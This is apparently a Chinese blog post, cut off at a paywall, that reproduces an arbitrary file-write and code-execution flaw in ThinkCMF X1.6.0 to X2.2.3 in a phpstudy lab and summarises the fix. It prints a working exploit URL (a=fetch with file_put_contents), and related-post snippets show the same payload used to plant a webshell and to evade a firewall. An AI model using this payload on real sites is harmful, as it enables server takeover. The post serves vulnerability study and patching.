ThinkCMF上传漏洞

最新推荐文章于 2023-09-22 16:43:22 发布
原创 最新推荐文章于 2023-09-22 16:43:22 发布 · 980 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #linux #安全

这篇博客详细介绍了ThinkCMF X1.6.0到X2.2.3版本存在的上传漏洞,攻击者可以利用该漏洞构造特定URL实现远程代码执行。环境搭建过程包括下载ThinkCMF X2.2.0并使用phpstudy。漏洞复现步骤包括输入特定payload以创建恶意文件。修复方案为修改HomebaseController.class.php和AdminbaseController.class.php中display和fetch函数的访问权限为protected。

ThinkCMF上传漏洞

一.漏洞描述

ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2
ThinkCMF X2.2.3

二.漏洞原理

ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。

三.环境搭建

下载ThinkCMF X2.2.0 链接:https://pan.baidu.com/s/1dEJJoU9?errno=0&errmsg=Auth%20Login%20Sucess&&bduss=&ssnerror=0&traceid=
使用phpstudy搭建即可

四.漏洞复现

访问目标网站,如下图所示:
在这里插入图片描述
输入payload:
?a=fetch&templateFile=public/index&prefix=’’&content=file_put_contents(‘test.php’,’<?php phpinfo(); ?>’)
后回车
在这里插入图片描述
回车后页面空白如下图所示
<

最低0.47元/天 解锁文章
【组件攻击链】ThinkCMF 高危漏洞分析与利用
further_eye的博客
11-18 1593
ThinkCMF X2.x系列最大的风险存在于ThinkCMF框架中Controller中的两个模板操作函数。ThinkCMF 5系列近两年比较出名的就是CVE-2019-6713、CVE-2019-7580两个后台任意代码执行漏洞
thinkCMF 文件包含漏洞
Hacker_by_V的博客
09-09 1811
thinkCMF 文件包含漏洞 昨天给大家复现了tomcat CVE-2020-1938漏洞,那今天咱们一起再来看看,最为经典的thinkCMF文件包含漏洞。 ​ 首先我们在去介绍这个漏洞之前,我们需要先了解一下这个漏洞thinkCMFthinkCMF它是一个开源的,支持swoole的开源内容管理框架,让web开发更快,节约时间,这个框架的话是基于thinkphp的二次开发框架,所以说在我们国内还是有大部分的网站使用到这样的一个框架的。 那么我们可以想象一下如果这个框架出现了一个漏洞,那它的影响范围是
ThinkCMF 2.2.0漏洞
2301_79773660的博客
09-22 599
?>’)/shell.php?>’)
ThinkCMF 框架上的任意内容包含漏洞
Sylon的博客
10-25 4677
0x01 背景 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。 ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。 每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又...
thinkcmfx漏洞太大_thinkcmf漏洞集合
weixin_39765695的博客
12-22 695
thinkcmf漏洞集合在先知逛的时候看到的的,后面发现是thinkcmf 翻了一下自己的漏洞库对比了一下版本发现,泡泡大佬这里看的是1.6版本的,而官方最后的版本 2.2.3 所以做一下漏洞补充。注:thinkcmf 并没有死,他拥有两个版本一个是 thinkcmf5 一个是 thnkcmf2.2.3 但是这两个版本都有漏洞,因为现在thinkcmf2.2.3使用的人越来越少了,所以爆出来,至于...
ThinkCmf文件包含漏洞fetch函数-过宝塔防火墙Poc1
08-03
### ThinkCmf 文件包含漏洞详解:Fetch 函数与绕过宝塔防火墙 #### 一、漏洞背景 ThinkCMF是一款基于ThinkPHP框架开发的轻量级内容管理系统,广泛应用于各类网站开发。然而,在实际应用过程中,由于其设计缺陷或...
ThinkCMF+Dedecms+discuz漏洞复现
热门推荐
1ance's blog
11-13 4万+
写在前面:本文为网上下载的cms搭建的靶场环境,内含thinkCMF+dedecms+discuz!;通过对靶场的测试,对cms的漏洞进行复现。 欢迎大家点赞收藏,点点关注更好了hhhhhh 文章目录0x001 环境搭建0x002 漏洞复现0x01 弱口令0x02 任意文件上传0x03 头像上传处存在任意文件删除漏洞0x04 任意文件包含漏洞0x05 后台存在SQL注入0x06 URL重定向0x07 远程代码执行0x08 任意文件上传0x09 存储型XSS0x10 远程代码执行0x11 个人资料处存在存储型
ThinkCMF v5.0.190111 后台代码执行漏洞复现
weixin_59086772的博客
12-15 3223
近期雨笋教育小编要经常来和大家分享渗透技术干货了,感兴趣的可以多多关注我们。 0x00前言 thinkcmf5.0.19 这个版本后台提供路由自定义, 其中路由的别名对单引号缺少过滤, 导致引发漏洞。 0x01环境搭建 官方github下载地址: https://github.com/thinkcmf/thinkcmf/archive/5.0.190111.zip 将网站源码解压至phpstudy WEB目录下: C:\phpStudy\PHPTutorial 配置phpstudy实
ThinkCMF X2.2.2 漏洞获取网站权限测试
xu_1234567的博客
09-15 431
1.测试环境 创建ThinkCMF X2.2.2框架,下载antsword,下面是AntSword官网 https://github.com/AntSwordProject/antSword/releases 下载完成后进行安装,安装教程可百度查询 2.漏洞利用 在ThinkCMF X2.2.2框架中通过构造a参数的fetch方法,创建文件在文件写入一句话木马代码 ?a=fetch&templateFile=public/index&prefix=''&content=<php
thinkcmf 文件包含 x1.6.0-x2.2.3漏洞复现
weixin_42675091的博客
09-23 1005
thinkcmf 文件包含 x1.6.0-x2.2.3漏洞复现
thinkcmf 上传视图文件管理
12-07
thinkcmf框架的插件. 原框架上传文件需要多次上传同一文件,占用资源. 插件解决当前用户的资源重复利用
thinkcmf 代码执行 (CVE-2019-7580) 漏洞复现
YouthBelief的博客
05-10 3913
所有文章,仅供安全研究与学习之用,后果自负! thinkcmf 代码执行 CVE-2019-7580thinkcmf 代码执行 (CVE-2019-7580)0x01 漏洞描述0x02 影响范围0x03 漏洞复现3.1 登录后台3.2 漏洞利用3.2.1webshell3.2 phpinfo3.3 获取系统命令0x04 漏洞修复 thinkcmf 代码执行 (CVE-2019-7580) 复现小心会搞崩环境。 0x01 漏洞描述 ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于Thi
ThinkCMF框架修复漏洞 名称:ThinkPHP5 远程代码执行高危漏洞(CNNVD-201812-617)
M翠峰如簇的专栏
12-01 496
漏洞名称:ThinkPHP5 远程代码执行高危漏洞(CNNVD-201812-617) 漏洞造成的影响 由于ThinkPHP5框架对Request类的method处理存在缺陷,导致黑客构造特定的请求,可直接GetWebShell入侵服务器。 ThinkCMF框架用ThinkPHP5.011内核修复方法如下: /simplewind/thinkphp/library/think/App.php 类的module方法的获取控制器的代码后面加上 if (!preg_match('/^[A-Za-z](\w.
thinkcmf任意包含漏洞
lionwerson的博客
11-18 2172
thinkcmf影响范围: thinkcmf <= 2.2.2 安装好thinkcmf: poc: ?a=display&templateFile=README.md 通过模板缓存实现的漏洞,可以读取和写入日志文件: 写入webshell: ?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('1.php','<?php..
thinkcmf5.0.180901 远程代码执行漏洞分析
qq_21510303的专栏
02-03 5948
最近thinkcmf爆出了一个后台登录后的远程代码执行漏洞,非常好奇看了下决定写一个分析过程分析下如何执行代码的。如何搭建环境就不多介绍了,大家可以phpstudy或者xampp,thinkcmf 的源代码可以直接从github或者码云上下载。历史版本自己找下下面开始我的分析。 首先先执行下漏洞,安装好后admin身份直接登陆,在后台-设置-url美化-添加url规则,设置内容 原始网址 por...
thinkcmfx漏洞太大_ThinkCMFX任意文件包含漏洞(学习)
weixin_39967120的博客
12-22 402
前言:最近爆出来的漏洞ThinkCmfX版本应该是通杀的,基于3.X Thinkphp开发的我们就拿这个payload来进行分析http://127.0.0.1/index.php?a=fetch&content=我们要知道tp框架的特性,可以通过这种形式的路由方式进行访问相应的功能点,例如通过g\m\a参数指定分组\控制器\方法我们可以跟进父类的fetch的方法中查看发现还调用了父类的...
记录 ThinkCMF 框架 X2.2.3 版本漏洞发现与解决
Peak Xin's Blog
03-24 1190
接到网警通知,说网站有安全漏洞,根据网警提供的检测报告,经过各种尝试,终于复现了,现在记录这一激动人心的时刻。因为它的这两个方法是公用的,我们需要把它改为私用的,这样才可以不被前端的用户去任意的利用。,根据网警提供的检测报告在postman工具上操作复现漏洞情况。那找解决方法吧,升级框架肯定是不现实的,好歹是找了解决方案。网站是基于ThinkCMF框架搭建的,查看版本是。点击发送,看看结果,意不意外惊不惊喜!修复后,再次访问,解决了。
ThinkCMF框架任意内容包含漏洞
qq_17754023的博客
02-28 2348
ThinkCMF简介 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展 每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时是如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本 漏洞介绍 远程攻击者在无需任何权限情况下,通过构造特定的
php 任意文件包含漏洞,PHPThinkCMFX任意文件包含漏洞
weixin_39552768的博客
04-14 158
前言:最近爆出来的漏洞ThinkCmfX版本应该是通杀的,基于3.X Thinkphp开发的代码下载地址:https://gitee.com/thinkcmf/ThinkCMFX/releases我们就拿这个payload来进行分析http://127.0.0.1/index.php?a=fetch&content=我们要知道tp框架的特性,可以通过这种形式的路由方式进行访问相应的功能点...
ThinkCMF 内容包含漏洞详解与利用
"ThinkCMF 任意内容包含getshell漏洞" ThinkCMF是一个基于PHP+MYSQL的中文内容管理框架,其核心构建于ThinkPHP 3.2.3版本。该框架设计了灵活的应用机制,允许开发者根据需求以应用的形式扩展基础管理功能。每个应用...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值